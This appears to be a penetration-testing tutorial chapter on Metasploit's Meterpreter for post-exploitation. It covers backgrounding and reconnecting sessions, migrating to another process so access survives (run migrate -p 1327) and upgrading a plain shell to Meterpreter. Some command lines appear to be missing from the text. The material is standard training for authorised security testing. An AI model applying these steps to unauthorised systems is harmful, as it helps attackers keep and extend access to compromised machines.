Meterpreter shell for post-exploitation
By now you probably has some kind of shell to the target. If it is not a meterpreter shell you should probably try to turn the current shell into a meterpreter shell, since it gives you a lot of tools available really easy.
So just create a meterpreter-shell from msfvenom or something like that. Maybe a php-shell. Or whatever you have access to. Then you just fire that script and get your meterpreter shell. Check out the chapter Exploiting/Msfvenom for more about creating payloads.
List all commands
Get help about a specific command
So first some basics. You can put the shell into a background job with the command
background. This might be useful if you have several shells going at the same time. Or if you want to move to a specific directory to upload or download some files.
List background sessions
Connect back to a background session
background -i 1
Upload and download files.
A really common and useful script that is build into metasploit is the migrate script. If you get the shell through some kind of exploits that crashes a program the user might shut down that program and it will close your session. So you need to migrate your session to another process. You can do that with the
First run this command to output all processes
Now you choose one and run
run migrate -p 1327
-pis the PID of the process.
There are tons of modules specifically created for post-exploitation. They can be found with
There is a point in doing stuff through metasploit. For example, if you find a exploit that does not have meterpreter available as a payload you can just start a normal shell and then upgrade it. To do that you do the following:
First you generate a shell through metasploit, either through a specici exploit or through a msfvenom-shell that you upload. Now that you have a normal shell it is time to upgrade it to a meterpreter shell.
First we have to leave the shell but without killing it. So we do
Background session 2? [y/N] y
Now we have that shell running in the background, and you can see it with
And you can connect to it again with
sessions -i 1
Or whatever the number of the session is.
So now we have the shell running in the background. It is time to upgrade
set LHOST ip
set session 1